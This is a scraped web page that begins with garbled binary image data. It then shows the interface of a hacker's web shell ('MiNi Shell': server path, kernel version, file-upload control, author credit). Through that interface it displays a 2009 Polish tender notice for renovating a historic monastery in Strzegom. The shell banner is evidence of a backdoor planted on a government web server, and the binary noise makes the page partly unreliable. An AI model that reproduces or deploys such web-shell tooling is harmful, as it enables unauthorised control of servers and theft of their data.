JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090917/158299-N-2009.html

<p class="kh_header"><b>Strzegom: REWITALIZACJA CENTRUM MIASTA STRZEGOMIA -
PRZEBUDOWA ZE ZMIANĄ SPOSOBU UŻYTKOWANIA BUDYNKU POKLASZTORNEGO PRZY UL. KOŚCIUSZKI W STRZEGOMIU</b><br>
<b>Numer ogłoszenia: 158299 - 2009; data zamieszczenia: 17.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Strzegom , ul. Rynek 38, 58-150 Strzegom, woj. dolnośląskie, tel. (074)  856-05-99, faks (074 ) 856-05-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strzegom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REWITALIZACJA CENTRUM MIASTA STRZEGOMIA -
PRZEBUDOWA ZE ZMIANĄ SPOSOBU UŻYTKOWANIA BUDYNKU POKLASZTORNEGO PRZY UL. KOŚCIUSZKI W STRZEGOMIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Projekt przewidziany do współfinansowania ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego na lata 2007-2013 Priorytet 9: Odnowa zdegradowanych obszarów na terenie Dolnego Śląska (Miasta)- Działanie 9.1. Odnowa zdegradowanych obszarów miejskich 
w miastach powyżej 10 tysięcy mieszkańców. 

1. Przedmiotem zamówienia jest przebudowa ze zmianą sposobu użytkowania budynku  poklasztornego przy 
ul. Kościuszki 2 w  Strzegomiu (dawny klasztor karmelitów, działki  nr 40/57 i 41/2, AM 14 obręb 3, obiekt 
w granicach obszaru centrum staromiejskiego wpisany do rejestru zabytków pod  numerem 938 decyzją z dnia 08.09.1961r. objęty jest strefą ścisłej ochrony konserwatorskiej i archeologicznej) wraz z niezbędną infrastrukturą i zagospodarowaniem terenu. Obiekt ma być przystosowany do ważnych funkcji społecznych 
i kulturalnych miasta, dostosowany dla potrzeb osób niepełnosprawnych. Ze względu na historyczny układ  obiektu  komunikacja pionowa zapewniona ma być zarówno przy pomocy wind jak i  wózków naschodowych.  Zakłada się maksymalne zachowanie układu historycznego z podkreśleniem zabytkowych wnętrz, zwłaszcza krużganków okalających średniowieczny wirydarz klasztorny. Elewacje obiektu mają zostać poddane pełnej konserwacji z zachowaniem kamiennego barokowego portalu i odtworzeniem detalu według zachowanych na elewacji    fragmentów. Dziedziniec klasztorny oprócz funkcji rekreacyjnych ma pełnić role lapidarium, gdzie eksponowane będą rzeźby oraz kamienne detale odnalezione przy okazji prowadzenia wykopalisk, badań a także remontów obiektów zabytkowych miasta Strzegomia.

Zamawiający czyni starania, aby zrealizować przedmiotowe zamówienie z udziałem środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa  Dolnośląskiego na lata 2007-2013- Priorytet 9 : Odnowa Zdegradowanych obszarów na terenie Dolnego Śląska (Miasta)- Działanie nr 9.1 Odnowa  zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy     mieszkańców. W przypadku uzyskania dofinansowania Wykonawca będzie zobowiązany wykonać prace zgodnie z zasadami ustalonymi przez Unię Europejską i instytucję Zarządzającą Regionalnym Programem Operacyjnym (m. in. Instytucja  Zarządzająca stawia wymagania, aby materiały użyte przy realizacji zamówienia pochodziły z krajów Unii Europejskiej,  chyba że brak jest producenta na terenie Unii Europejskiej). Wykonawca będzie zobowiązany również wypełniać obowiązki informacyjne i promocyjne określone 
w Wytycznych dotyczących promocji projektów UE dla Beneficjentów Regionalnego Programu Operacyjnego dla  Województwa  Dolnośląskiego na lata 2007-2013 - zgodnie z Poradnikiem dla Beneficjenta w ramach RPO WD na lata 2007 - 2013 dostępnym na stronie http://www.rpo.dolnyslask.pl i innymi przepisami 
i  wytycznymi krajowymi i unijnymi aktualnymi w okresie obowiązywania umowy.
Zakres robót obejmuje między innymi:
    - remont i adaptację istniejącego obiektu,
    - utworzenie na dziedzińcu lapidarium, 
    - uporządkowanie podwórza ,
    - wykonanie chodników, dojść i zieleni,
    - wykonanie drogi wewnętrznej i parkingów,
    - likwidację istniejącego przyłącza wody i gazu i wykonanie nowych przyłączy wod.kan., odtworzenie przykanalika kanalizacji sanitarnej, kontrolę stanu technicznego istniejących podłączeń kanalizacji deszczowej,
    - zabudowę nowej szafy gazowej,
    - wykonanie uziomu otokowego, instalacji odgromowej,
    - wykonanie instalacji wod-kan, gazowej, grzewczej, elektrycznej, wentylacji,

Przedmiot zamówienia obejmuje wykonanie:
-robót rozbiórkowych, demontażowych, ogólnobudowlanych, instalacyjnych,
konserwatorskich, restauratorskich,

Szczegółowy zakres robót  zawarty jest w projektach budowlanych i wykonawczych (załącznik nr 8), specyfikacjach technicznych wykonania i odbioru robót budowlanych (załącznik nr 9), które stanowią  podstawę do sporządzenia oferty. Przedmiary robót stanowią załączniki do specyfikacji (załącznik nr 10) i należy traktować je, jako element  dodatkowy, ułatwiający sporządzenie oferty.  W celu dokładnego skalkulowania ceny ofertowej wskazane jest przeprowadzenie wizji lokalnej przedmiotowego obiektu. Roboty ujęte 
w dokumentacji a nieujęte w kosztorysie ofertowym nie będą  traktowane, jako roboty dodatkowe i nie będą  finansowane przez  Zamawiającego. 

Zakres prac oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną ceną ofertową obejmuje także:
a/ obsługę geodezyjną (wytyczanie obiektów, mediów, wykonanie inwentaryzacji geodezyjnej powykonawczej),
b/  wycinkę krzewów, karczowanie korzeni wraz z ich usunięciem, 
c/  organizację, zabezpieczenie i zagospodarowanie placu budowy, 
d/  zorganizowanie i przeprowadzenie niezbędnych prób, badań i odbiorów,
e/  po zakończeniu robót doprowadzenie placu budowy do należytego stanu i porządku, wywóz gruzu, odpadów oraz materiałów powstałych po rozbiórce na wysypisko śmieci, utylizację odpadów budowlanych,
f/  promocję projektu, wykonanie tablic informacyjnych/pamiątkowych, umieszczenia logo i odpowiedniej treści  zgodnie  z Poradnikiem dla Beneficjenta w ramach RPO WD na lata  2007 - 2013 dostępnym na  stronie http://www.rpo.dolnyslask.pl i innymi przepisami i  wytycznymi krajowymi i unijnymi aktualnymi w okresie obowiązywania umowy,
g/ dysponowanie  przy wykonywaniu zamówienia osobą wykonującą prace konserwatorskie  przy zabytkowych elementach wystroju (kamiennego, metalowego) oraz badania konserwatorskie (kolorystyki elewacji 
i nawarstwień tynków we wnętrzu) z zastrzeżeniem, że prace konserwatorskie, prace restauratorskie lub badania konserwatorskie mogą prowadzić osoby, które posiadają tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku konserwacji i restauracji dzieł sztuki lub wyższych studiów 
w specjalności w zakresie konserwacji zabytków oraz odbyły po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową w zakresie konserwacji i badania zabytków, w dziedzinach nieobjętych programem wyższych studiów, prace te mogą prowadzić osoby, które posiadają przynajmniej średnie wykształcenie w danej dziedzinie oraz odbyły co najmniej 5-letnią praktykę zawodową 
w zakresie konserwacji i badania zabytków, (zgodnie z Decyzją nr 510/2008 Pozwolenie na prowadzenie prac i robót przy obiekcie zabytkowym z dnia 15.09.2008 wydaną przez Dolnośląskiego Konserwatora Zabytków we Wrocławiu /Delegatura w Wałbrzychu ).
h/ dysponowanie przy wykonywaniu zamówienia uprawnionym archeologiem, prowadzącym badania archeologiczne z zastrzeżeniem, że prace te prowadzić mogą osoby które posiadają tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku archeologia oraz odbyły po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową w zakresie tych badań (zgodnie z Decyzją nr 510/2008 Pozwolenie na prowadzenie prac i robót przy obiekcie zabytkowym z dnia 15.09.2008 wydaną przez Dolnośląskiego Konserwatora Zabytków we Wrocławiu /Delegatura w Wałbrzychu).

Roboty na  obiekcie należy prowadzić zgodnie z Prawem budowlanym i przepisami BHP. 
Wymaga się, aby na wykonany przedmiot zamówienia Wykonawca udzielił gwarancji jakości na okres min. 60 miesięcy na wykonane robot budowlane oraz na okres min 36 miesięcy na sprzęt i urządzenia od dnia sporządzenia protokołu odbioru końcowego wykonanego  przedmiotu umowy. Roszczenia z tytułu gwarancji jakości nie wyłączają odpowiedzialności Wykonawcy z tytułu rękojmi za wady przedmiotu umowy. Wykonawca udzieli Zamawiającemu na cały przedmiot umowy rękojmi za wady na okres równy okresowi gwarancji jakości.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.22.00.00-5, 45.31.12.00-2, 45.33.00.00-9, 45.33.11.00-7, 45.31.31.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 120000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności będącej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
   2) posiadają  niezbędną  wiedzę  i  doświadczenie  oraz  dysponują  potencjałem  technicznym i osobami  zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do   udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
 a) w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie   zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali roboty budowlane odpowiadające swoim rodzajem i wartością robotom  budowlanym stanowiącym przedmiot zamówienia,  tj.  wykonali min. jedną robotę budowlaną polegającą na budowie, przebudowie  bądź  remoncie budynku wraz 
z instalacjami i urządzeniami technicznymi o wartości  min. 5 000 000,00 zł  brutto oraz wykonali min. jedną robotę budowlaną polegającą na budowie, przebudowie bądź remoncie wraz 
z instalacjami budynku zabytkowego podlegającego ochronie konserwatora zabytków 
o wartości min. 900 000,00 zł brutto, 
b) dysponują osobami posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi 
w specjalnościach:
-  kierownik budowy posiadający uprawnienia w specjalności konstrukcyjno-budowlanej z co najmniej 5 letnim stażem pracy od uzyskania uprawnień na stanowisku kierownika budowy  i co najmniej 2-letnią praktyką na budowie przy zabytkach nieruchomych zgodnie z Rozporządzeniem Ministra Kultury  z dnia 09 czerwca 2004r. (Dz.U.z 2004r nr 150 poz.1579) w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych 
i poszukiwań ukrytych lub porzuconych zabytków ruchomych, członek właściwej izby samorządu zawodowego,
 - kierownik robót budowlanych z uprawnieniami w specjalności konstrukcyjno-budowlanej  umożliwiającymi kierowanie robotami budowlanymi, członek właściwej izby samorządu zawodowego  
z co najmniej 5 letnim stażem pracy od uzyskania  uprawnień,
 - kierownik robót  instalacyjnych z uprawnieniami w branży instalacje sanitarne oraz kierownik 
w branży instalacje elektryczne, członkowie/członek właściwej izby samorządu zawodowego z co najmniej  5 letnim stażem pracy od uzyskania  uprawnień;
    3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
tj.: a) posiadają polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od         odpowiedzialności cywilnej w zakresie prowadzonej działalności  o wartości nie mniejszej niż 
2 000 000 zł,
       b)  posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 2 000 000  zł;
4) nie podlegają wykluczeniu z postępowania na podstawie art.24 ustawy prawo zamówień  publicznych.
   Zamawiający dokona oceny spełniania powyższych warunków na podstawie złożonych przez wykonawcę dokumentów i oświadczeń wymienionych w Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia warunek/nie spełnia warunku. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać spełnienie przez wykonawcę wymaganych warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty  i oświadczenia, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:
    1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności     gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (jeżeli przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej).
    2) Wykaz wykonanych w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie robót budowlanych, odpowiadających swoim  rodzajem i wartością robotom budowlanym  stanowiącym przedmiot zamówienia  z podaniem ich wartości oraz daty i miejsca wykonania  oraz  dokumenty potwierdzające, że roboty te zostały wykonane należycie (załącznik nr 6).
3) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć 
w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (załącznik nr 7) oraz dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania robotami budowlanymi w wymaganych specjalnościach oraz zaświadczenia wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby. 
    4) Oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia - art. 22 ust 1 pkt 1-3  ustawy Prawo zamówień publicznych (załącznik nr 2).   
    5) Oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia - art. 22 ust 1 pkt 4 ustawy Prawo zamówień publicznych (załącznik nr 2a).   
6) Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 
2 000 000 zł. 
7) Informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wysokości co najmniej 2 000 000 zł, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.strzegom.pl (pod ogłoszeniem).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Rynek 38, 58-150 Strzegom, pok. 15 lub za zaliczeniem pocztowym. Cena specyfikacji 470 zł (plus koszty przesyłki - zaliczenie pocztowe).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2009 godzina 10:30, miejsce: Urząd Miejski, Rynek 38, 58-150 Strzegom - Biuro Obsługi Interesanta, parter - pok. 15.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt przewidziany do współfinansowania ze środków 
Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego na lata 2007-2013 Priorytet 9: Odnowa zdegradowanych obszarów na terenie Dolnego Śląska (Miasta) - Działanie 9.1. Odnowa zdegradowanych obszarów miejskich

Creat By MiNi SheLL
Email: jattceo@gmail.com